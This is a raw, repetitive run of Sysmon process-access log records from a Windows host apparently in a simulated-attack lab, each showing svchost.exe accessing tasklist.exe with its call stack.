21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 